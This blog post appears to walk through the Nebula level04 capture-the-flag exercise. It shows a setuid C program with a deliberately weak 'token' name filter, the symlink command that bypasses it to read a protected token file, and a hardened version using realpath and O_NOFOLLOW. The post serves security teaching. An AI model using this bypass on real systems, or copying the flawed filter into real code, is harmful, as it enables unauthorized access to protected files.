Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises.

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>      /* err() is used below but was missing from the listing */

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  /* The only guard: reject any argument whose text contains "token".
     It inspects the string passed in, not the file that string resolves to. */
  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  /* Opened with the setuid owner's privileges; symlinks are followed. */
  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  /* Read at most one buffer's worth and echo it to stdout. */
  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
  return 0;
}

We read the code above. If we pass a file as the argument, the program reads it for us. If the argument contains the string "token", we fail. If it is a file the program cannot open or read, we fail. The read is capped at the size of the 1024-byte buffer.

So, it looks like we need proper privileges to read the token file.

With our information in hand, we SSH into the host:

level04@nebula:/home/flag04$ ls -lah
total 13K
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ 

Per usual, we see that the flag04 file has the SUID bit set, is owned by flag04, and its group permissions allow level04 (us) to run it.

We run the file to get a feel for what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around, we realize that the check only looks at the name we pass in, not at the file that name resolves to. So we just need to create a symbolic link, with a name that does not contain "token", that points at the token file, and have the program read the link.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We create a symbolic link at /tmp/level04 pointing to /home/flag04/token, and verify it with ls -lah.

We then test our theory and execute:

level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.
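The bypass works because the filter matches on the argument string rather than on the file it resolves to. As an added example (not part of the level or the Nebula source), here is that check beside a hardened version that canonicalises the path with realpath(3) before matching and opens with O_NOFOLLOW; the temp-directory fixture it builds is constructed to mirror the /tmp/level04 -> /home/flag04/token link above.

```c
#define _GNU_SOURCE            /* exposes realpath, mkdtemp, O_NOFOLLOW on glibc */
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Original level04 logic: only the literal argument string is inspected. */
int naive_blocked(const char *arg)
{
    return strstr(arg, "token") != NULL;
}

/* Hardened check: canonicalise first, so the name the kernel will really
 * open is what gets matched. An unresolvable path is blocked (fail closed). */
int hardened_blocked(const char *arg)
{
    char resolved[PATH_MAX];
    if (realpath(arg, resolved) == NULL)
        return 1;
    return strstr(resolved, "token") != NULL;
}

/* Hardened open: refuse a symlink in the final path component even after the
 * check passed, closing the check-then-open race. Returns an fd or -1. */
int open_no_follow(const char *arg)
{
    return open(arg, O_RDONLY | O_NOFOLLOW);
}
/* Constructed fixture (built once): a fresh temp dir holding a "token" file
 * and a symlink "link" -> token, mirroring /tmp/level04 -> /home/flag04/token.
 * Returns the symlink's path, or NULL if the fixture could not be created. */
const char *fixture_link(void)
{
    static char link[PATH_MAX];
    static int built = 0;
    if (built) return link[0] ? link : NULL;
    built = 1;
    char dir[] = "/tmp/lvl04XXXXXX", target[PATH_MAX];
    if (mkdtemp(dir) == NULL) return NULL;
    snprintf(target, sizeof target, "%s/token", dir);
    int fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd == -1) return NULL;
    (void)write(fd, "secret\n", 7);
    close(fd);
    snprintf(link, sizeof link, "%s/link", dir);
    if (symlink(target, link) == -1) { link[0] = '\0'; return NULL; }
    return link;
}
```

Against the fixture, naive_blocked() lets the link through while hardened_blocked() rejects it, and open_no_follow() refuses the symlink outright with ELOOP.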

Thanks for reading!

-geoda